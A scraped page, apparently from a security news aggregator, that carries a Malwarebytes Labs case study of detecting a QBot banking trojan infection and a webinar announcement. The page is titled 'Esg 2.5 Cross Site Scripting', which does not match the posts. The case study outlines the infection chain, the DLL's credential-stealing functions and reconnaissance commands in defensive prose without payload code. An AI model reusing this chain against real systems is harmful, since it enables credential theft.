*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

Categories: Business
How Malwarebytes MDR successfully helped a company detect and respond to the potent banking Trojan QBot.



(Read more...)




The post Tracking down a trojan: An inside look at threat hunting in a corporate network appeared first on Malwarebytes Labs.

At Malwarebytes, we talk a lot about the importance of threat hunting for SMBs—and not for no good reason, either. Just consider the fact that, when a threat actor breaches a network, they don’t attack right away. The median amount of time between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed.

Threat hunting helps find and remediate highly-obfuscated threats like these that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

The bad news for small-to-medium sized businesses (SMBs): Manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC).

That’s where Malwarebytes Managed Detection and Response (MDR) comes in.

Malwarebytes MDR is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack.

But talk is cheap: let’s look at a real time where Malwarebytes MDR successfully helped a company detect and respond to a potent banking Trojan known as QBot.

**The Incident**

On a date left undisclosed for security reasons, a reputable oil and gas company we’ll refer to as Company 1 experienced an intrusion in their network. The culprit was **Qakbot** (also known as QBot).

QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. What's more, it also facilitates remote access to the compromised machines.

QBot has recently been observed being distributed as part of a phishing campaign using PDFs and Windows Script Files (WSF).

The QBot campaign illustrated (Source: Jerome Segura | Malwarebytes Labs)

QBot attacks start with a reply-chain phishing email, when threat actors reply to a chain of emails with a malicious link or attachment.

A sample reply-chain phishing email in French, carrying a PDF attachment disguised as a cancellation letter. (Source: BleepingComputer)

Once someone in the email chain opens the attached PDF, they see a message saying, "This document contains protected files, to display them, click on the 'open' button." Clicking the button downloads a ZIP file containing the WSF script.

The heavily obfuscated script contains a mix of JS and VBScript code that, when run, triggers a PowerShell that then downloads the QBot DLL from a list of hardcoded URLs. This script tries each URL until a file is downloaded to the Windows Temp folder (%TEMP%) and executed.

Once QBot runs, it issues a PING command to check for an internet connection. It then injects itself into wermgr.exe, a legitimate Windows Error Manager program, to run quietly in the background.

**The Infection**

The initial infection at Company 1 was traced to a laptop in their network.The Qakbot malware used **Windows Script File (WSF), executed by WSCRIPT.EXE, to launch a PowerShell script encoded in Base64.**

The Process Graph tile under the Suspicious Activity page in Nebula shows a visual representation of the files or processes touched by the suspicious activity.

Clicking on the node to view more details, we see WSCRIPT.EXE was used to execute a Windows Script File, which spawned an instance of PS executing a Base64 encoded command.

Node detail showing malicious encoded PowerShell script.

This script was designed to be patient and stealthy.

It first initiated a waiting period of 4 seconds before creating an array of URLs, presumably leading to malicious websites. The malware then attempted to download a file from each URL, with each file being checked for a minimum size of 100,000 bytes, implying a meaningful content requirement. If a download failed, the script would wait for 4 seconds before moving to the next URL.

The downloaded files were executed using the **RUNDLL32.EXE Windows utility, which was invoked from the PowerShell instance**. This allowed the downloaded file, dubbed "**FreeformOzarkite.marseillais**," to load and execute its malicious payload.

RUNDLL32.EXE was invoked from the previous instance of PowerShell to execute a malicious payload or module that is stored in the file "FreeformOzarkite.marseillais" in the temporary folder of the infected user. 

**The Malicious DLL**

A specific DLL file, identified as **zibkwyxdtpcrqshpuqkoomcoba.dll**, was found to be one of the malicious codes executed by the Qakbot infection.

Node detail showing the malicious DLL is executed (zibkwyxdtpcrqshpuqkoomcoba.dll).

Decomposition of this DLL revealed several nefarious functions, including:

*   Code injection into other processes.
*   Harvesting of sensitive data, like Chrome and Outlook passwords, Wi-Fi passwords, and Bitcoin wallets.
*   Capturing screenshots.
*   Modifying system settings, like disabling the User Account Control (UAC), to make the system more vulnerable to further attacks.
*   Communication with a remote command and control (C&C) server for data exfiltration and remote command execution.

The team also saw system enumeration utilizing **WHOAMI.EXE** and **IPCONFIG.EXE**:

*   whoami /all
*   ipconfig /all

**Data Exfiltration and Remediation**

The malware attempted to send the collected data to a known Qakbot C2 IP address. This is presumably where the stolen data would be accumulated and analyzed by the malicious actors.

However, the Malwarebytes MDR team promptly **detected and contained this threat**, taking steps such as cleaning the system of the infection, informing Company 1 of the incident, and providing actionable recommendations to prevent future compromises.

**Threat hunting with MDR**

How Malwarebytes MDR works

Threat hunting is essential for small-and-medium-sized businesses, as attackers can potentially remain undetected for over two weeks after compromising a network.

Unfortunately, threat hunting is complicated and requires a dedicated SOC and seasoned cybersecurity staff, barring most SMBs from utilizing this important security practice. 

In this article, we’ve outlined the significant role that Malwarebytes MDR can play in **uncovering, managing, and remediating threats like Qakbot**, helping you avoid business disruption and financial loss.

Want to learn more about Malwarebytes MDR and threat hunting? Click the link below for a quote. 

**Stop Qbot attacks today**

Tracking down a trojan: An inside look at threat hunting in a corporate network

Categories: Business
Join our upcoming Byte into Security webinar for a deep dive into K-12 cybersecurity. 



(Read more...)




The post Webinar alert: How Coffee County Schools safeguards 7500 students and 1200 staff appeared first on Malwarebytes Labs.

We're excited to announce that our much-anticipated 4th edition of the Byte Into Security webinar series is right around the corner. Scheduled for **May 31st at 10:00AM PST/1:00pm EST**, this session is a goldmine for those facing the unique challenges of K-12 cybersecurity. The webinar is free, and you can register right now!

We're bringing **Logan Evans**, Director of Information Systems at Coffee County Schools in Georgia, into conversation with **Marcin Kleczynski**, CEO of Malwarebytes. Together, they will explore the intricacies of maintaining robust cybersecurity for a rural school district with 7500 students and 1200 staff, managed by a small but mighty team of 10 IT and security professionals.

Here's what you can expect from this dialogue:

*   An **in-depth understanding** of the hurdles faced by Coffee County Schools, in particular a stringent security audit.
*   How Malwarebytes' Nebula platform has **eased the management** of cybersecurity for Logan and his team.
*   The role and value of **machine learning** in the school's cybersecurity strategy.
*   Tips for balancing a secure environment that remains **accessible to end-users**.
*   Strategies for **overcoming the challenge** of hiring IT and security professionals in the education sector.
*   An emphasis on why **security awareness training** is essential for school districts.

You'll also get a chance to learn about the cybersecurity threats looming over educational institutions and how to counteract them. 

We look forward to welcoming you to another exciting episode of the Byte Into Security webinar series. Don't miss out on the chance to get an insider's perspective on K-12 cybersecurity!

Register Here

Tag

#mac